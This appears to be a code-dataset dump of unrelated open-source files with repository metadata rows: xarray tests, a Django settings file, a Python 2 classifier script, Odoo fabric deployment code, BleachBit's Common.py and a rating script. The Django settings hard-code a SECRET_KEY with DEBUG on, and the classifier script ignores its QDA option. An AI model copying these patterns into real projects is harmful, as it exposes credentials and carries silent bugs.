assert duck_array_ops.array_equiv(np.nan, np.array(np.nan, dtype=object))
assert not duck_array_ops.array_equiv(0, np.array(1, dtype=object))
class TestDictionaries:
@pytest.fixture(autouse=True)
def setup(self):
self.x = {"a": "A", "b": "B"}
self.y = {"c": "C", "b": "B"}
self.z = {"a": "Z"}
def test_equivalent(self):
assert utils.equivalent(0, 0)
assert utils.equivalent(np.nan, np.nan)
assert utils.equivalent(0, np.array(0.0))
assert utils.equivalent([0], np.array([0]))
assert utils.equivalent(np.array([0]), [0])
assert utils.equivalent(np.arange(3), 1.0 * np.arange(3))
assert not utils.equivalent(0, np.zeros(3))
def test_safe(self):
# should not raise exception:
utils.update_safety_check(self.x, self.y)
def test_unsafe(self):
with pytest.raises(ValueError):
utils.update_safety_check(self.x, self.z)
def test_compat_dict_intersection(self):
assert {"b": "B"} == utils.compat_dict_intersection(self.x, self.y)
assert {} == utils.compat_dict_intersection(self.x, self.z)
def test_compat_dict_union(self):
assert {"a": "A", "b": "B", "c": "C"} == utils.compat_dict_union(self.x, self.y)
with pytest.raises(
ValueError,
match=r"unsafe to merge dictionaries without "
"overriding values; conflicting key",
):
utils.compat_dict_union(self.x, self.z)
def test_dict_equiv(self):
x = {}
x["a"] = 3
x["b"] = np.array([1, 2, 3])
y = {}
y["b"] = np.array([1.0, 2.0, 3.0])
y["a"] = 3
assert utils.dict_equiv(x, y) # two nparrays are equal
y["b"] = [1, 2, 3] # np.array not the same as a list
assert utils.dict_equiv(x, y) # nparray == list
x["b"] = [1.0, 2.0, 3.0]
assert utils.dict_equiv(x, y) # list vs. list
x["c"] = None
assert not utils.dict_equiv(x, y) # new key in x
x["c"] = np.nan
y["c"] = np.nan
assert utils.dict_equiv(x, y) # as intended, nan is nan
x["c"] = np.inf
y["c"] = np.inf
assert utils.dict_equiv(x, y) # inf == inf
y = dict(y)
assert utils.dict_equiv(x, y) # different dictionary types are fine
y["b"] = 3 * np.arange(3)
assert not utils.dict_equiv(x, y) # not equal when arrays differ
def test_frozen(self):
x = utils.Frozen(self.x)
with pytest.raises(TypeError):
x["foo"] = "bar"
with pytest.raises(TypeError):
del x["a"]
with pytest.raises(AttributeError):
x.update(self.y)
assert x.mapping == self.x
assert repr(x) in (
"Frozen({'a': 'A', 'b': 'B'})",
"Frozen({'b': 'B', 'a': 'A'})",
)
def test_repr_object():
obj = utils.ReprObject("foo")
assert repr(obj) == "foo"
assert isinstance(obj, Hashable)
assert not isinstance(obj, str)
def test_repr_object_magic_methods():
o1 = utils.ReprObject("foo")
o2 = utils.ReprObject("foo")
o3 = utils.ReprObject("bar")
o4 = "foo"
assert o1 == o2
assert o1 != o3
assert o1 != o4
assert hash(o1) == hash(o2)
assert hash(o1) != hash(o3)
assert hash(o1) != hash(o4)
def test_is_remote_uri():
assert utils.is_remote_uri("http://example.com")
assert utils.is_remote_uri("https://example.com")
assert not utils.is_remote_uri(" http://example.com")
assert not utils.is_remote_uri("example.nc")
class Test_is_uniform_and_sorted:
def test_sorted_uniform(self):
assert utils.is_uniform_spaced(np.arange(5))
def test_sorted_not_uniform(self):
assert not utils.is_uniform_spaced([-2, 1, 89])
def test_not_sorted_uniform(self):
assert not utils.is_uniform_spaced([1, -1, 3])
def test_not_sorted_not_uniform(self):
assert not utils.is_uniform_spaced([4, 1, 89])
def test_two_numbers(self):
assert utils.is_uniform_spaced([0, 1.7])
def test_relative_tolerance(self):
assert utils.is_uniform_spaced([0, 0.97, 2], rtol=0.1)
class Test_hashable:
def test_hashable(self):
for v in [False, 1, (2,), (3, 4), "four"]:
assert utils.hashable(v)
for v in [[5, 6], ["seven", "8"], {9: "ten"}]:
assert not utils.hashable(v)
@requires_dask
def test_dask_array_is_scalar():
# regression test for GH1684
import dask.array as da
y = da.arange(8, chunks=4)
assert not utils.is_scalar(y)
def test_hidden_key_dict():
hidden_key = "_hidden_key"
data = {"a": 1, "b": 2, hidden_key: 3}
data_expected = {"a": 1, "b": 2}
hkd = utils.HiddenKeyDict(data, [hidden_key])
assert len(hkd) == 2
assert hidden_key not in hkd
for k, v in data_expected.items():
assert hkd[k] == v
with pytest.raises(KeyError):
hkd[hidden_key]
with pytest.raises(KeyError):
del hkd[hidden_key]
def test_either_dict_or_kwargs():
result = either_dict_or_kwargs(dict(a=1), None, "foo")
expected = dict(a=1)
assert result == expected
result = either_dict_or_kwargs(None, dict(a=1), "foo")
expected = dict(a=1)
assert result == expected
with pytest.raises(ValueError, match=r"foo"):
result = either_dict_or_kwargs(dict(a=1), dict(a=1), "foo")
@pytest.mark.parametrize(
["supplied", "all_", "expected"],
[
(list("abc"), list("abc"), list("abc")),
(["a", ..., "c"], list("abc"), list("abc")),
(["a", ...], list("abc"), list("abc")),
(["c", ...], list("abc"), list("cab")),
([..., "b"], list("abc"), list("acb")),
([...], list("abc"), list("abc")),
],
)
def test_infix_dims(supplied, all_, expected):
result = list(utils.infix_dims(supplied, all_))
assert result == expected
@pytest.mark.parametrize(
["supplied", "all_"], [([..., ...], list("abc")), ([...], list("aac"))]
)
def test_infix_dims_errors(supplied, all_):
with pytest.raises(ValueError):
list(utils.infix_dims(supplied, all_))
@pytest.mark.parametrize(
"nested_list, expected",
[
([], []),
([1], [1]),
([1, 2, 3], [1, 2, 3]),
([[1]], [1]),
([[1, 2], [3, 4]], [1, 2, 3, 4]),
([[[1, 2, 3], [4]], [5, 6]], [1, 2, 3, 4, 5, 6]),
],
)
def test_iterate_nested(nested_list, expected):
assert list(iterate_nested(nested_list)) == expected
|
apache-2.0
| 7,916,387,651,723,424,000
| 30.164179
| 88
| 0.582759
| false
| 3.128559
| true
| false
| false
|
tingcar/PSEP
|
src/PSEP/settings.py
|
1
|
3680
|
"""
Django settings for PSEP project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'a9j_-kq$z8#r(8h4m)74l&&gspv%%e=!*(rnys6m^(c13aq%sn'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#my apps
'contact',
'enbuckets',
'profiles',
'internalmail',
'events',
#tools
'south',
'registration',
'debug_toolbar',
'dajaxice',
'dajax',
)
ACCOUNT_ACTIVATION_DAYS = 7
REGISTRATION_OPEN = False
auth_password_reset = '/'
AUTH_PROFILE_MODULE = 'profiles.profile'
LOGIN_REDIRECT_URL = '/accounts/dashboard/'
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'PSEP.urls'
WSGI_APPLICATION = 'PSEP.wsgi.application'
######## DATABASE #########
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.request',
'django.core.context_processors.csrf',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'dajaxice.finders.DajaxiceFinder',
)
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
# STATIC_URL = '/static/'
STATIC_URL = '/assets/'
MEDIA_URL='/media/'
#static
MEDIA_ROOT = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','media')
STATIC_ROOT = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','static-only')
STATICFILES_DIRS = (
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','assets'),
)
TEMPLATE_DIRS = (
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','templates'),
)
|
apache-2.0
| -5,925,759,729,754,591,000
| 22.144654
| 110
| 0.701087
| false
| 3.279857
| false
| false
| false
|
TakLee96/discriminant
|
train.py
|
1
|
2430
|
import numpy as np
from os import path
from scipy.io import loadmat
from timer import timer
from classifier import LDAClassifier, QDAClassifier
""" TODO: choose either mnist or spam >>HERE<< """
which = "spam.mat"
which = "mnist.mat"
""" TODO: choose either mnist or spam >>HERE<< """
timer.start("reading", which, "data from matlab file")
raw = loadmat(path.join(path.dirname(__file__), "data", which))
raw_data = raw['data']
raw_labl = raw['label'][0]
timer.end("done")
timer.start("permuting data randomly")
np.random.seed(0)
ordering = np.random.permutation(len(raw_data))
data = np.ndarray(shape=raw_data.shape, dtype=raw_data.dtype)
labl = np.ndarray(shape=raw_labl.shape, dtype=raw_labl.dtype)
for old, new in enumerate(ordering):
data[new] = raw_data[old]
labl[new] = raw_labl[old]
del raw, raw_data, raw_labl, ordering
timer.end("done")
def cross_validation(method, k=5):
if method == "lda":
Classifier = LDAClassifier
elif method == "qda":
Classifier = QDAClassifier
else:
raise Exception("lda or qda only")
timer.start("folding data into", k, "copies")
data_slice = [ None ] * k
labl_slice = [ None ] * k
train_rate = [ 0.0 ] * k
valid_rate = [ 0.0 ] * k
n = len(labl)
m = n / k
for i in range(k):
data_slice[i] = data[(i*m):min((i+1)*m,n)]
labl_slice[i] = labl[(i*m):min((i+1)*m,n)]
timer.end("done")
for j in range(k):
timer.start("validation iteration #", j)
training_data = np.concatenate(tuple(data_slice[i] for i in range(k) if i != j))
training_labl = np.concatenate(tuple(labl_slice[i] for i in range(k) if i != j))
print ".... data formating done"
c = LDAClassifier(training_data, training_labl)
print ".... classifier training done"
train_rate[j] = c.score(c.classify_all(training_data), training_labl)
print ".... training accuracy computation done"
valid_rate[j] = c.score(c.classify_all(data_slice[j]), labl_slice[j])
print ".... validation accuracy computation done"
timer.end("done; training accuracy =", train_rate[j], "; validation accuracy =", valid_rate[j])
print k, "fold cross validation for", method, "on dataset", which, "complete"
print ".... overall training accuracy =", np.mean(train_rate)
print ".... overall validation accuracy =", np.mean(valid_rate)
cross_validation("qda")
|
mit
| -644,527,991,301,725,700
| 33.714286
| 103
| 0.634979
| false
| 3.164063
| false
| false
| false
|
marcoscrcamargo/ic
|
results.py
|
1
|
2191
|
import csv
import time
fieldnames = ['class', 'knn_hst', 'hst_pxl', 'mlp_hst', 'mlp_pxl', 'svm_hst', 'svm_pxl', 'ensemble_hst', 'ensemble_pxl', 'ensemble_all']
writer = None
file = 'results_' + str(time.ctime()) +'.csv'
def initializate(fname=file):
global writer
global file
file = fname
with open(fname, 'w') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
def write_row(label, knn_hst, hst_pxl, mlp_hst, mlp_pxl, svm_hst, svm_pxl, ensemble_hst, ensemble_pxl, ensemble_all):
global writer
with open(file, 'a') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow({ fieldnames[0]: label,
fieldnames[1]: knn_hst,
fieldnames[2]: hst_pxl,
fieldnames[3]: mlp_hst,
fieldnames[4]: mlp_pxl,
fieldnames[5]: svm_hst,
fieldnames[6]: svm_pxl,
fieldnames[7]: ensemble_hst,
fieldnames[8]: ensemble_pxl,
fieldnames[9]: ensemble_all})
def main():
initializate()
write_row('e', '1', '2', '0', '1', '2', '0', '1', '0', '2')
# write_csv = {'class':'none',
# 'knn_hst': str(knn_ret['hst']['label']) + '_' + str(knn_ret['hst'][str(knn_ret['hst']['label'])]),
# 'hst_pxl': str(knn_ret['pxl']['label']) + '_' + str(knn_ret['pxl'][str(knn_ret['pxl']['label'])]),
# 'mlp_hst': str(mlp_ret['hst']['label']) + '_' + str(mlp_ret['hst'][str(mlp_ret['hst']['label'])]),
# 'mlp_pxl': str(mlp_ret['pxl']['label']) + '_' + str(mlp_ret['pxl'][str(mlp_ret['pxl']['label'])]),
# 'svm_hst': str(svm_ret['hst']['label']) + '_' + str(svm_ret['hst'][str(svm_ret['hst']['label'])]),
# 'svm_pxl': str(svm_ret['pxl']['label']) + '_' + str(svm_ret['pxl'][str(svm_ret['pxl']['label'])]),
# 'ensemble_hst': str(hst_c['label']) + '_' + str(hst_c[str(hst_c['label'])]),
# 'ensemble_pxl': str(pxl_c['label']) + '_' + str(pxl_c[str(pxl_c['label'])]),
# 'ensemble_all': str(all_c['label']) + '_' + str(all_c[str(all_c['label'])])}
if __name__ == "__main__":
main()
|
gpl-3.0
| 6,560,752,996,770,302,000
| 41.980392
| 136
| 0.524418
| false
| 2.633413
| false
| false
| false
|
lisogallo/odoo-it-infra
|
it_infrastructure/server_repository.py
|
1
|
2915
|
# -*- coding: utf-8 -*-
from openerp import models, fields, api, _
from openerp.exceptions import except_orm
from fabric.api import cd, sudo, settings
from fabric.contrib.files import exists
import os
class server_repository(models.Model):
""""""
_name = 'it_infrastructure.server_repository'
_description = 'server_repository'
_rec_name = 'repository_id'
repository_id = fields.Many2one(
'it_infrastructure.repository',
string='Repository',
required=True
)
path = fields.Char(
string='Path'
)
server_id = fields.Many2one(
'it_infrastructure.server',
string='server_id',
ondelete='cascade',
required=True
)
@api.one
def get_repository(self):
print 'Getting repository'
self.path = self.repository_id.get_repository(self.server_id)[0]
@api.one
def update_repository(self, path=False):
print 'Updating repository'
self.server_id.get_env()
if not path:
path = self.path
if not path or not exists(path, use_sudo=True):
# raise except_orm(
# _('No Repository Folder!'),
# _("Please check that the especified path '%s' exists \
# in order to download for first time!") % path
# )
cmd = 'git clone %s %s' % (self.repository_id.url, path)
try:
# sudo(cmd, user=self.server_id.user_name, group='odoo')
sudo(cmd, user='odoo', group='odoo')
except SystemExit, e:
raise except_orm(
_("Error executing '%s' on '%s'") % (cmd, path),
_('Unknown system error')
)
else:
cmd = 'git pull'
with cd(path.strip()):
try:
sudo(cmd)
except Exception, e:
raise except_orm(
_("Error executing '%s' on '%s'") % (cmd, path),
_('Command output: %s') % e
)
except SystemExit, e:
raise except_orm(
_("Error executing '%s' on '%s'") % (cmd, path),
_('Unknown system error')
)
@api.one
def get_update_repository(self):
self.server_id.get_env()
if not self.path:
# Check if repository on path
path = os.path.join(
self.server_id.sources_path, self.repository_id.directory)
if exists(path, use_sudo=True):
# aparentemente ya existe el repo, intentamos actualizarlo
self.update_repository(path)
self.path = path
else:
self.get_repository()
else:
self.update_repository()
return True
|
agpl-3.0
| -4,230,107,899,597,576,000
| 31.032967
| 74
| 0.50223
| false
| 4.31213
| false
| false
| false
|
FabianWe/csd-freiburg-forms
|
csd_freiburg_forms/donate_o_meter/donate_o_meter.py
|
1
|
2011
|
# Copyright (C) 2016 Fabian Wenzelmann
#
# This file is part of csd-freiburg-forms.
#
# csd-freiburg-forms is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# csd-freiburg-forms is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with csd-freiburg-forms. If not, see <http://www.gnu.org/licenses/>.
#
from PIL import Image
class DonateOMeter:
def __init__(self, background, filling, aim, box=None):
self.background = background
self.filling = filling
self.aim = aim
if box is None:
width, height = background.size
box = (0, 0, width - 1, height - 1)
self.box = box
def draw(self, current):
box = self.box
# otherwise compute the percent and crop the fill area
percent = current / self.aim
width, height = self.background.size
mh = box[3] - box[1]
ch = int(mh * percent)
# first check if ch is zero, in this case return the background
if ch <= 0:
return self.background.copy()
# check if ch is the height of the box, in this case return
# the filling
if ch >= (box[3] - box[1]):
return self.filling.copy()
img = self.background.copy()
crop_left = box[0]
crop_upper = box[3] - ch
crop_right = box[2]
crop_lower = box[3]
# crop the designated area from the image
meter_area = self.filling.crop(
(crop_left, crop_upper, crop_right, crop_lower))
img.paste(meter_area, (crop_left, crop_upper))
return img
|
gpl-3.0
| -3,033,785,776,946,643,500
| 33.672414
| 79
| 0.632521
| false
| 3.744879
| false
| false
| false
|
maximilianofaccone/puppy-siberian
|
usr/share/bleachbit/Common.py
|
1
|
7633
|
# vim: ts=4:sw=4:expandtab
# -*- coding: UTF-8 -*-
# BleachBit
# Copyright (C) 2014 Andrew Ziem
# http://bleachbit.sourceforge.net
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Code that is commonly shared throughout BleachBit
"""
import gettext
import locale
import os
import sys
if 'nt' == os.name:
from win32com.shell import shell, shellcon
APP_VERSION = "1.2"
APP_NAME = "BleachBit"
APP_URL = "http://bleachbit.sourceforge.net"
print "info: starting %s version %s" % (APP_NAME, APP_VERSION)
socket_timeout = 10
# Setting below value to false disables update notification (useful
# for packages in repositories).
online_update_notification_enabled = True
#
# Paths
#
# Windows
bleachbit_exe_path = None
if hasattr(sys, 'frozen'):
# running frozen in py2exe
bleachbit_exe_path = os.path.dirname(
unicode(sys.executable, sys.getfilesystemencoding()))
else:
# __file__ is absolute path to bleachbit/Common.py
bleachbit_exe_path = os.path.dirname(
unicode(__file__, sys.getfilesystemencoding()))
# license
license_filename = None
license_filenames = ('/usr/share/common-licenses/GPL-3', # Debian, Ubuntu
os.path.join(
bleachbit_exe_path, 'COPYING'), # Microsoft Windows
'/usr/share/doc/bleachbit-' + APP_VERSION +
'/COPYING', # CentOS, Fedora, RHEL
'/usr/share/doc/packages/bleachbit/COPYING',
# OpenSUSE 11.1
'/usr/share/doc/bleachbit/COPYING', # Mandriva
'/usr/pkg/share/doc/bleachbit/COPYING', # NetBSD 5
'/usr/share/licenses/common/GPL3/license.txt') # Arch Linux
for lf in license_filenames:
if os.path.exists(lf):
license_filename = lf
break
# configuration
portable_mode = False
options_dir = None
if 'posix' == os.name:
options_dir = os.path.expanduser("~/.config/bleachbit")
elif 'nt' == os.name:
if os.path.exists(os.path.join(bleachbit_exe_path, 'bleachbit.ini')):
# portable mode
portable_mode = True
options_dir = bleachbit_exe_path
else:
# installed mode
options_dir = os.path.expandvars("${APPDATA}\\BleachBit")
options_file = os.path.join(options_dir, "bleachbit.ini")
# personal cleaners
personal_cleaners_dir = os.path.join(options_dir, "cleaners")
# system cleaners
if sys.platform.startswith('linux'):
system_cleaners_dir = '/usr/share/bleachbit/cleaners'
elif sys.platform == 'win32':
system_cleaners_dir = os.path.join(bleachbit_exe_path, 'share\\cleaners\\')
elif sys.platform[:6] == 'netbsd':
system_cleaners_dir = '/usr/pkg/share/bleachbit/cleaners'
else:
system_cleaners_dir = None
print 'warning: unknown system cleaners directory for platform ', sys.platform
# local cleaners directory (for running from source tree)
local_cleaners_dir = os.path.normpath(
os.path.join(bleachbit_exe_path, '../cleaners'))
# application icon
__icons = ('/usr/share/pixmaps/bleachbit.png', # Linux
os.path.join(bleachbit_exe_path, 'share\\bleachbit.png'), # Windows
'/usr/pkg/share/pixmaps/bleachbit.png', # NetBSD
os.path.normpath(os.path.join(bleachbit_exe_path, '../bleachbit.png'))) # local
appicon_path = None
for __icon in __icons:
if os.path.exists(__icon):
appicon_path = __icon
# locale directory
if os.path.exists("./locale/"):
# local locale (personal)
locale_dir = os.path.abspath("./locale/")
else:
# system-wide installed locale
if sys.platform.startswith('linux'):
locale_dir = "/usr/share/locale/"
elif sys.platform == 'win32':
locale_dir = os.path.join(bleachbit_exe_path, 'share\\locale\\')
elif sys.platform[:6] == 'netbsd':
locale_dir = "/usr/pkg/share/locale/"
# launcher
launcher_path = '/usr/share/applications/bleachbit.desktop'
if 'posix' == os.name:
autostart_path = os.path.expanduser(
'~/.config/autostart/bleachbit.desktop')
#
# setup environment
#
# Windows XP doesn't define localappdata, but Windows Vista and 7 do
def environ(varname, csidl):
try:
os.environ[varname] = shell.SHGetSpecialFolderPath(None, csidl)
except:
traceback.print_exc()
msg = 'Error setting environemnt variable "%s": %s ' % (
varname, str(sys.exc_info()[1]))
import GuiBasic
GuiBasic.message_dialog(None, msg)
if 'nt' == os.name:
environ('localappdata', shellcon.CSIDL_LOCAL_APPDATA)
environ('documents', shellcon.CSIDL_DESKTOPDIRECTORY)
#
# gettext
#
try:
user_locale = locale.getdefaultlocale()[0]
except:
print 'warning: error getting locale: %s' % str(sys.exc_info()[1])
user_locale = None
if None == user_locale:
user_locale = 'C'
print "warning: No default locale found. Assuming '%s'" % user_locale
if 'win32' == sys.platform:
os.environ['LANG'] = user_locale
try:
if not os.path.exists(locale_dir):
raise RuntimeError('translations not installed')
t = gettext.translation('bleachbit', locale_dir)
_ = t.ugettext
except:
def _(msg):
"""Dummy replacement for ugettext"""
return msg
try:
ungettext = t.ungettext
except:
def ungettext(singular, plural, n):
"""Dummy replacement for Unicode, plural gettext"""
if 1 == n:
return singular
return plural
#
# pgettext
#
# Code released in the Public Domain. You can do whatever you want with this package.
# Originally written by Pierre Métras <pierre@alterna.tv> for the OLPC XO laptop.
#
# Original source: http://dev.laptop.org/git/activities/clock/plain/pgettext.py
# pgettext(msgctxt, msgid) from gettext is not supported in Python implementation < v2.6.
# http://bugs.python.org/issue2504
# Meanwhile we get official support, we have to simulate it.
# See http://www.gnu.org/software/gettext/manual/gettext.html#Ambiguities for
# more information about pgettext.
# The separator between message context and message id.This value is the same as
# the one used in gettext.h, so PO files should be still valid when Python gettext
# module will include pgettext() function.
GETTEXT_CONTEXT_GLUE = "\004"
def pgettext(msgctxt, msgid):
"""A custom implementation of GNU pgettext().
"""
if msgctxt is not None and msgctxt is not "":
translation = _(msgctxt + GETTEXT_CONTEXT_GLUE + msgid)
if translation.startswith(msgctxt + GETTEXT_CONTEXT_GLUE):
return msgid
else:
return translation
else:
return _(msgid)
# Map our pgettext() custom function to _p()
_p = lambda msgctxt, msgid: pgettext(msgctxt, msgid)
#
# URLs
#
base_url = "http://bleachbit.sourceforge.net"
help_contents_url = "%s/link.php?version=%s&lang=%s&target=help" \
% (base_url, APP_VERSION, user_locale)
release_notes_url = "%s/link.php?version=%s&lang=%s&target=release_notes" \
% (base_url, APP_VERSION, user_locale)
update_check_url = "%s/communicate.php" % base_url
|
gpl-3.0
| 3,201,493,757,747,861,000
| 29.898785
| 91
| 0.666798
| false
| 3.414765
| false
| false
| false
|
lucabaldini/rating02
|
dump_rating.py
|
1
|
7983
|
#!/usr/bin/env python
#
# Copyright (C) 2019, Luca Baldini.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import numpy
import matplotlib.pyplot as plt
from rating import *
import _rating2020 as _rating
def filter_db_pers(db_pers):
"""This is filtering a DocentDatabse object removing all the persons with
less than 2 products (which automatically get 0 rating points).
Note that, for the thing to work, this has to be called after a loop
over the db where the product statistics has been calculated and
updated.
"""
db = DocentDatabase()
for pers in db_pers:
if pers.num_products >= 2:
db.append(pers)
else:
print('Filtering out %s (%d products)...' %\
(pers.full_name, pers.num_products))
return db
def dump_rating(file_path, collab_threshold=30):
"""Dump the full rating information.
"""
# Load the underlying database objects.
db_prod = load_db_prod()
db_pers = load_db_pers()
sub_areas = sorted(Product.SUB_AREA_DICT.keys())
# First loop over the products, where we mark the invalid as such, and
# we manually set the journal impact factor where necessary.
print('Post-processing product list...')
for prod in db_prod:
# Mark invalids.
if prod.row_index in _rating.INVALID:
print('Marking product @ row %d for %s as invalid...' %\
(prod.row_index, prod.author_surname))
prod.valid = False
# Set impact factor if necessary.
if prod.pub_type == '1.1 Articolo in rivista' and \
prod.impact_factor() is None and \
prod.journal in _rating.IMPACT_FACTOR_DICT.keys():
journal = prod.journal
impact_factor = _rating.IMPACT_FACTOR_DICT[journal]
print('Setting IF for %s @ row %d to %.3f...' %\
(journal, prod.row_index, impact_factor))
prod.set_impact_factor(impact_factor)
# Break out the docent database into the three sub-areas.
# Mind at this points the sub-lists still contain the persons with less
# than 2 products.
print('Populating sub-areas...')
pers_dict = {}
for sub_area in sub_areas:
pers_dict[sub_area] = db_pers.select(sub_area=sub_area)
# Actual loop to calculate the rating points and the basic product
# statistics for all the docents.
print('Calculating rating points...')
for sub_area in sub_areas:
for pers in pers_dict[sub_area]:
prods = db_prod.select(author_full_name=pers.full_name, valid=True)
pers.num_products = len(prods)
if len(prods) == 0:
continue
rating = sum(prod.rating_points(sub_area, _rating.RATING_DICT) for\
prod in prods)
# Take any leave of absence into account.
if pers.full_name in _rating.LOA_SCALING_DICT:
scale = _rating.LOA_SCALING_DICT[pers.full_name]
print('Scaling rating for %s by %.3f' % (pers.full_name, scale))
rating *= scale
num_authors = numpy.array([prod.num_authors for prod in prods])
# Update the Docent object.
pers.rating = rating
# Note that we're casting all the numpy scalars to native Python
# types for the excel interface module to be able to write them in
# the output file.
pers.num_collab_products = \
int((num_authors > collab_threshold).sum())
pers.min_num_authors = int(num_authors.min())
pers.median_num_authors = float(numpy.median(num_authors))
pers.max_num_authors = int(num_authors.max())
# Now that we have the basic product statistics we can filter out
# the docents with less than 2 products.
for sub_area in sub_areas:
print('Filtering docent databse for sub-area %s...' % sub_area)
pers_dict[sub_area] = filter_db_pers(pers_dict[sub_area])
# Sort the docents and dump the excel file.
print('Sorting docents within sub-areas...')
table = ExcelTableDump()
col_names = ['Ranking', 'Nome', 'Punti rating', 'Numero prodotti',
'Numero prodotti con > %d autori' % collab_threshold,
'# autori min', '# autori medio', '# autori max']
for sub_area in sub_areas:
rows = []
pers_dict[sub_area].sort(reverse=True)
print('Ratings points for sub-area %s:' % sub_area)
for i, pers in enumerate(pers_dict[sub_area]):
pers.ranking = i
print('%2i -- %s: %f rating points.' %\
(i, pers.full_name, pers.rating))
rows.append([i, pers.full_name, pers.rating, pers.num_products,
pers.num_collab_products, pers.min_num_authors,
pers.median_num_authors, pers.max_num_authors])
table.add_worksheet('Sottoarea %s' % sub_area, col_names, rows)
table.write(file_path)
# Do some plotting.
for sub_area in sub_areas:
plt.figure('Sottoarea %s' % sub_area, figsize=(12, 8))
num_persons = len(pers_dict[sub_area])
num_points = _rating.RATING_POINTS_PER_DOCENT * num_persons
plt.title('Sottoarea %s (%d docenti, %.3f punti)' %\
(sub_area, num_persons, num_points), size=18)
ranking = numpy.array([pers.ranking for pers in pers_dict[sub_area]])
rating = numpy.array([pers.rating for pers in pers_dict[sub_area]])
plt.plot(ranking, rating, 'o')
plt.xlabel('Ranking')
plt.ylabel('Rating points')
for pers in pers_dict[sub_area]:
x = pers.ranking
y = pers.rating
name = pers.full_name.split()[0].title()
if name in ['Di', 'Del', 'Prada']:
name += ' %s' % pers.full_name.split()[1].title()
txt = '%s, %d (%d) <%.1f>' %\
(name, pers.num_products, pers.num_collab_products,
pers.median_num_authors)
plt.text(x, y, txt, rotation=20., ha='left', va='bottom')
leg = 'Cognome, # prod (# prod > %d auth) <median # auth>' %\
(collab_threshold)
plt.text(0.5, 0.9, leg, transform=plt.gca().transAxes, size=12)
# Calculate the quantiles.
print('Calculating quantiles for sub-area %s...' % sub_area)
quantiles = numpy.floor(numpy.linspace(0.22, 0.75, 3) * num_persons)
quantiles += 0.5
for q in quantiles:
plt.axvline(q, ls='dashed')
quantiles = numpy.concatenate(([-0.5], quantiles, [num_persons + 0.5]))
psum = 0
for i, (q1, q2) in enumerate(zip(quantiles[:-1], quantiles[1:])):
mask = (ranking > q1) * (ranking < q2)
r = ranking[mask]
n = len(r)
frac = float(n) / num_persons
p = 4 - i
psum += p * n
print('%d docents with %d points...' % (n, p))
plt.text(r.mean(), 2, '%d x %d = %d (%.1f %%)' %\
(p, n, n * p, 100. * frac), ha='center')
print('Total rating points for area %s: %d' % (sub_area, psum))
plt.savefig('rating02_2020_%s.png' % sub_area)
plt.show()
if __name__ == '__main__':
dump_rating('rating02_2020.xls')
|
gpl-3.0
| 4,332,046,184,173,600,300
| 41.68984
| 80
| 0.591131
| false
| 3.555902
| false
| false
| false
|
ademariag/kapitan
|
kapitan/refs/secrets/vaultkv.py
|
2
|
9041
